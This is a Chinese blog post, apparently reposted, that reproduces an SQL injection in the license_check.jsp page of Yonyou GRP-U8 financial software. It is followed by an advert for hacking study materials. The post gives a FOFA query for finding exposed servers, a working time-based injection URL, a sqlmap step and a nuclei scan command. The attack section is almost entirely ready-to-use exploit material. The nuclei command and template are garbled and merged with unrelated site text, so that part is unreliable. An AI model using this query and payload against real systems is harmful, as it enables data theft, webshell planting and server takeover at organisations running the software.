0x01 漏洞介绍
用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
fofa:app=”用友-GRP-U8”
![图片[1] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/30b1c590d90b2ab2d7a81b62bf394ad6.png)
0x02 POC:
/u8qx/license_check.jsp?kjnd=1’;WAITFOR%20DELAY%20’0:0:3’—
![图片[2] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/3157ba6f527f8e05538a6451370f5621.png)
0x03 sqlmap 一把梭哈
![图片[3] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/24bf83ee96668f28ddf95c6a1c5142da.png)
0x04 nuclei poc
命令:nuclei -t /nuclei-poc/yonyou/用友-GRP-U8+sql.yaml -uTrack 安全社区 — 掌控安全在线教育- Track 知识社区 – 掌控安全在线教育 – Powered by 掌控者
![图片[4] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/img_convert/cc5dbe3d767f5aeb81da3cbfac41d343.png)
id: u8grp_license_checkinfo:name: 用友GRP-U8 License Check漏洞author: YourNameseverity: highrequests:- method: GETpath:- "{{BaseURL}}/u8qx/license_check.jsp" />还没看够?可以关注~
免费领取安全学习资料包!(私聊进群一起学习,共同进步)![图片[5] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/696e6ebf81ba4e4088ab61199b458bbe.png)
![图片[5] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E)
渗透工具
![图片[6] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/56cdd550dee54698a92263de58bd0601.png)
技术文档、书籍
![图片[7] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/652226bb649c48f1ba2d2dcb2dd99994.png)
![图片[8] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/8eb67d8e49b24ba3ad64b228bfc96437.png)
![图片[9] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/beffdcae9d8f47c5a138535abc3ce4a4.png)
面试题
帮助你在面试中脱颖而出
![图片[10] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/96b26867b47c43beb34bb50e81793fdd.png)
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
![图片[11] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/79cd596e5b504c3497c8119a197f7dc8.png)
![图片[12] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/e3cb409be92a4dd7affb2420cdf9cfda.png)
![图片[13] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/804ffd4b6d3a40b3b1d128af107615ca.png)
应急响应笔记
![图片[14] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/98f2e272c244447a968178c067b1b393.png)
学习路线
![图片[15] - 用友 GRP-U8 存在sql注入漏洞复现 - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/8108dfea89044ea7b82a6fb6d3fa6ef5.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
